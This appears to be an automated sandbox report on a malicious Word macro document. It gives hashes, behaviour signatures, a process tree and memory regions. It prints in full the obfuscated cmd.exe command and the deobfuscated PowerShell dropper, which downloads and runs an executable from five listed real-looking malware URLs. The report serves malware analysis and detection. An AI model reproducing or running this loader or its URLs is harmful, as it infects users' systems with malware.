Analysis

  • max time kernel
    118s
  • max time network
    122s
  • platform
    windows7_x64
  • resource
    win7-20240221-en
  • resource tags

    arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system
  • submitted
    25-05-2024 17:11

General

  • Target

    72abbface4c8cea179df95e9717cfde4_JaffaCakes118.doc

  • Size

    203KB

  • MD5

    72abbface4c8cea179df95e9717cfde4

  • SHA1

    c358ec289edd6febf28edd2c518ba43055c78086

  • SHA256

    f349dcd66a084e8b9b503b274d9128d22931497b78675b8e8ab424977db22275

  • SHA512

    653bd8f5e4c9d57b39545a7372f3273dbf573ce064ed4c450628f53402738cade128fafc0f8c79f011072edf9e20f9da9bbf3271f42b977ebc129bb3229f86f0

  • SSDEEP

    3072:Xte2dw99fk3vIAWHWaaYuK5vE0B8FlgN2zU/Li0LZ:9Hdw7kwAWHWFK5TBmlgNfLFZ

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://stalfond-n.ru/KDYGGWK

exe.dropper

http://skladvysotka.ru/tbf6tn5r

exe.dropper

http://tdov.ru/0KJ9f6g

exe.dropper

http://doop.pl/Q3XAEGW7

exe.dropper

http://tranz2000.net/del/4Wpsnr5sxD

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 8 IoCs
  • An obfuscated cmd.exe command-line is typically used to evade detection. 1 IoCs
  • Drops file in Windows directory 1 IoCs
  • Office loads VBA resources, possible macro or embedded object present
  • Modifies Internet Explorer settings 1 TTPs 31 IoCs
  • Modifies registry class 64 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 12 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\72abbface4c8cea179df95e9717cfde4_JaffaCakes118.doc"
    1⤵
    • Drops file in Windows directory
    • Modifies Internet Explorer settings
    • Modifies registry class
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:640
    • C:\Windows\splwow64.exe
      C:\Windows\splwow64.exe 12288
      2⤵
        PID:3036
      • C:\Windows\SysWOW64\CMd.exe
        CMd /V/C"s^e^t +{^,^'=^519 ^93^1 ^35^1^ 1^53^ 1^59^ 1^09 ^093 ^1^05^ ^109 910 1^0^9^ ^301 ^3^01 13^9 ^35^1^ ^5^09 ^039 0^1^5}^5^03^}^13^5{5^31h^5^0^9c^319t5^9^0^a310c^309^}9^3^0^;10^5k903a^051^e905r^1^59^b^0^5^1^;13^0M^05^3^X^913^o0^15$^0^9^1 1^5^0^m035^e^015^t^9^01I9^03^-5^1^3^e1^30k^1^90o^3^9^5v^3^1^0n^9^0^3^I^593^;^150)^1^03M^5^3^9^X193^o^519^$5^0^3 5^3^0,^0^1^3^I5^1^9P^1^59P^1^59$3^19(^195^e^0^15l0^19i1^0^3^F9^0^3^d^1^5^9a91^0o^9^53l5^9^1n0^5^9w^53^9o159D^1^3^5.5^3^9Q^9^3^5C^31^0m^351$9^1^3^{310y3^0^1r^5^9^3^t310{^30^5)3^95P^193R5^09^L^593$^3^90^ 93^5n^0^19i1^0^3 5^13^I3^5^0P3^5^0^P^53^1^$105(^15^0^h903c^3^1^0a93^0e^53^9r039^o51^3^f^301^;3^1^0^'91^5e^190x0^1^5^e^1^30^.190'^50^9+^139^i019a^3^05^L^3^0^5^$^95^0+^01^5^'5^9^1\95^0'^395^+^53^0c9^1^5^i05^9^l^390^b^39^1u^09^5p^053^:531v^51^9n^3^0^5e1^05^$^9^0^1=095^M1^0^9X^3^1^5^o^9^50$^1^5^0^;^1^03'9^0^3^2^0^19^990^360^39^'^0^31 ^3^0^5^=^3^0^1 ^0^5^3^i^0^19^a^3^9^5^L0^1^5$0^3^9;3^10)^15^0'5^01@^39^5'^0^5^1(1^0^9t^1^53^i^3^59^l^9^51p^3^19S^0^3^1.^3^51'9^5^0D^159x0^9^3s13559^0^1r5^3^0n3^59^s^01^3p9^05W1^35^459^0/^503l^1^0^9e^31^9^d1^0^3/^1^3^5^t9^30e^0^35n0^1^3^.^5^03^0^305^0^90^10^19^323^05^z^5^91n^9^1^5a510r^35^9t^1^95/^0^39/9^0^1^:^10^9p0^9^3^t0^53t93^1h^5^0^3@51^3735^9W150G1^5^0E0^91^A^935X^053^3^9^1^0Q^95^1/^3^1^9l019^p9^5^0^.0^39^p^5^9^1^o50^9^o031d^3^1^0/1^59/^09^1:^91^5p510^t5^39t10^9h530^@^30^9^g93^1^690^1^f^03^59^90^5J0^1^9K91^500^1^5/^09^1u^19^3r^3^5^1.^9^01v^903^o390d^50^1t^01^9/^3^9^5/^0^5^1^:953p^903t^3^0^9^t509h^1^50^@9^0^1r^9^1^55^539n50^1^t^1^5^3^653^0f^0^9^3^b01^9t^39^5/^90^5u^059r93^1.0^53^a^1^35^k5^13^t^319o^0^15s3^5^0y^01^3v^30^5^d539^a30^5^l^01^3k^5^10s^5^0^3/^0^31/9^3^1^:0^31p^95^0^t^539^t53^1^h^5^13@^1^3^0^K^19^5^W0^1^5G1^0^3G^30^5^Y^3^15^D^5^9^1^K^5^3^1/19^0^u^0^9^3r^5^9^1.50^1n^190^-51^3^d^3^0^1n^3^0^5o1^05f3^5^1l^0^5^1^a5^9^0t9^35s^1^09/9^1^3/901:^0^39^p03^5t90^5^t90^1h^139^'^5^01^=^50^9P^9^50R91^0^L^35^1$1^50;^359t0^3^1n^35^1e03^9^i9^51^l3^91C9^0^3b^391e3^5^1^W^5^93^.3^1^0t0^91e15^9N^395 ^3^0^9t^93^0c190e^135j^13^0b^5^3^1^o^0^5^9^-310^w^5^3^0^e^3^9^0n35^0=0^9^3Q^19^3C03^9m^9^5^1^$1^03^ ^9^1^3l^1^93^l^3^50e^13^5^h^310^s^509r0^93^e^390^w^1^50^o0^93^p&&^f^or /^L %^Z ^in (^14^15^,^-4^,^3)^d^o se^t ^'^`^,=!^'^`^,!!+{^,^':~%^Z,1!&&^i^f %^Z=^=^3 c^al^l %^'^`^,:~^5%"
        2⤵
        • Process spawned unexpected child process
        • An obfuscated cmd.exe command-line is typically used to evade detection.
        • Suspicious use of WriteProcessMemory
        PID:2916
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          powershell $mCQ=new-object Net.WebClient;$LRP='http://stalfond-n.ru/KDYGGWK@http://skladvysotka.ru/tbf6tn5r@http://tdov.ru/0KJ9f6g@http://doop.pl/Q3XAEGW7@http://tranz2000.net/del/4Wpsnr5sxD'.Split('@');$Lai = '692';$oXM=$env:public+'\'+$Lai+'.exe';foreach($PPI in $LRP){try{$mCQ.DownloadFile($PPI, $oXM);Invoke-Item $oXM;break;}catch{}}
          3⤵
          • Blocklisted process makes network request
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:1856

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015

      Filesize

      68KB

      MD5

      29f65ba8e88c063813cc50a4ea544e93

      SHA1

      05a7040d5c127e68c25d81cc51271ffb8bef3568

      SHA256

      1ed81fa8dfb6999a9fedc6e779138ffd99568992e22d300acd181a6d2c8de184

      SHA512

      e29b2e92c496245bed3372578074407e8ef8882906ce10c35b3c8deebfefe01b5fd7f3030acaa693e175f4b7aca6cd7d8d10ae1c731b09c5fa19035e005de3aa

    • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

      Filesize

      344B

      MD5

      deac35bb2205e28e01ad8f6b7e390ee4

      SHA1

      13a5b658c15f1767889208f86d190ed1b5b2bef9

      SHA256

      0bc19509194659deca004fca5ec19f8da5acf1ee16fb1d3a33cff57decc4eed3

      SHA512

      270b494a2463b474612aa952ea45af31b23f3f07ad5027e2fa92a93355b5586071159e53bb6f2e005d1004a51934caccfafcd8a232ef9bada48548a82e8d193e

    • C:\Users\Admin\AppData\Local\Temp\CabDDC4.tmp

      Filesize

      65KB

      MD5

      ac05d27423a85adc1622c714f2cb6184

      SHA1

      b0fe2b1abddb97837ea0195be70ab2ff14d43198

      SHA256

      c6456e12e5e53287a547af4103e0397cb9697e466cf75844312dc296d43d144d

      SHA512

      6d0ef9050e41fbae680e0e59dd0f90b6ac7fea5579ef5708b69d5da33a0ece7e8b16574b58b17b64a34cc34a4ffc22b4a62c1ece61f36c4a11a0665e0536b90d

    • C:\Users\Admin\AppData\Local\Temp\TarDF70.tmp

      Filesize

      177KB

      MD5

      435a9ac180383f9fa094131b173a2f7b

      SHA1

      76944ea657a9db94f9a4bef38f88c46ed4166983

      SHA256

      67dc37ed50b8e63272b49a254a6039ee225974f1d767bb83eb1fd80e759a7c34

      SHA512

      1a6b277611959720a9c71114957620517ad94541302f164eb872bd322292a952409bafb8bc2ac793b16ad5f25d83f8594ccff2b7834e3c2b2b941e6fc84c009a

    • C:\Users\Admin\AppData\Roaming\Microsoft\Templates\Normal.dotm

      Filesize

      20KB

      MD5

      c785f09c67e09b58cfb1cf93aac1bfd3

      SHA1

      9b16201906f0025560c3d8f368b12f13ea06b229

      SHA256

      3f2eff2fa74a13f4d7c771e9dc31f6a13c2d836805d9b8edc0b1a8c62a512bfa

      SHA512

      fa882d4fa8b29fe6e64998fc3580adb2c6e86516b19fc974dd92800c0f52fcabc90da59515d1c506cdcb6b3cd8043f48861d36db04fc226d94076df7238381d4

    • memory/640-19-0x00000000001C0000-0x00000000002C0000-memory.dmp

      Filesize

      1024KB

    • memory/640-17-0x00000000001C0000-0x00000000002C0000-memory.dmp

      Filesize

      1024KB

    • memory/640-137-0x00000000001C0000-0x00000000002C0000-memory.dmp

      Filesize

      1024KB

    • memory/640-226-0x00000000001C0000-0x00000000002C0000-memory.dmp

      Filesize

      1024KB

    • memory/640-225-0x00000000001C0000-0x00000000002C0000-memory.dmp

      Filesize

      1024KB

    • memory/640-122-0x00000000001C0000-0x00000000002C0000-memory.dmp

      Filesize

      1024KB

    • memory/640-66-0x00000000001C0000-0x00000000002C0000-memory.dmp

      Filesize

      1024KB

    • memory/640-52-0x00000000001C0000-0x00000000002C0000-memory.dmp

      Filesize

      1024KB

    • memory/640-49-0x00000000001C0000-0x00000000002C0000-memory.dmp

      Filesize

      1024KB

    • memory/640-48-0x00000000001C0000-0x00000000002C0000-memory.dmp

      Filesize

      1024KB

    • memory/640-38-0x00000000001C0000-0x00000000002C0000-memory.dmp

      Filesize

      1024KB

    • memory/640-24-0x00000000001C0000-0x00000000002C0000-memory.dmp

      Filesize

      1024KB

    • memory/640-23-0x00000000001C0000-0x00000000002C0000-memory.dmp

      Filesize

      1024KB

    • memory/640-22-0x00000000001C0000-0x00000000002C0000-memory.dmp

      Filesize

      1024KB

    • memory/640-21-0x00000000001C0000-0x00000000002C0000-memory.dmp

      Filesize

      1024KB

    • memory/640-0-0x000000002FD51000-0x000000002FD52000-memory.dmp

      Filesize

      4KB

    • memory/640-18-0x00000000001C0000-0x00000000002C0000-memory.dmp

      Filesize

      1024KB

    • memory/640-129-0x00000000001C0000-0x00000000002C0000-memory.dmp

      Filesize

      1024KB

    • memory/640-16-0x00000000001C0000-0x00000000002C0000-memory.dmp

      Filesize

      1024KB

    • memory/640-15-0x00000000001C0000-0x00000000002C0000-memory.dmp

      Filesize

      1024KB

    • memory/640-14-0x00000000001C0000-0x00000000002C0000-memory.dmp

      Filesize

      1024KB

    • memory/640-13-0x00000000001C0000-0x00000000002C0000-memory.dmp

      Filesize

      1024KB

    • memory/640-12-0x00000000001C0000-0x00000000002C0000-memory.dmp

      Filesize

      1024KB

    • memory/640-11-0x00000000001C0000-0x00000000002C0000-memory.dmp

      Filesize

      1024KB

    • memory/640-10-0x00000000001C0000-0x00000000002C0000-memory.dmp

      Filesize

      1024KB

    • memory/640-20-0x00000000001C0000-0x00000000002C0000-memory.dmp

      Filesize

      1024KB

    • memory/640-9-0x00000000001C0000-0x00000000002C0000-memory.dmp

      Filesize

      1024KB

    • memory/640-8-0x00000000001C0000-0x00000000002C0000-memory.dmp

      Filesize

      1024KB

    • memory/640-7-0x00000000001C0000-0x00000000002C0000-memory.dmp

      Filesize

      1024KB

    • memory/640-6-0x00000000001C0000-0x00000000002C0000-memory.dmp

      Filesize

      1024KB

    • memory/640-2-0x00000000715DD000-0x00000000715E8000-memory.dmp

      Filesize

      44KB

    • memory/640-299-0x00000000715DD000-0x00000000715E8000-memory.dmp

      Filesize

      44KB

    • memory/640-300-0x00000000001C0000-0x00000000002C0000-memory.dmp

      Filesize

      1024KB

    • memory/640-1-0x000000005FFF0000-0x0000000060000000-memory.dmp

      Filesize

      64KB

    • memory/640-316-0x00000000715DD000-0x00000000715E8000-memory.dmp

      Filesize

      44KB